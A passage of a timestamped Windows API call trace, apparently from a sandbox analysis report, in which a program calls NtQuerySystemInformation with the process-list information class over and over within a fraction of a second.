(dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0240.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0240.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: 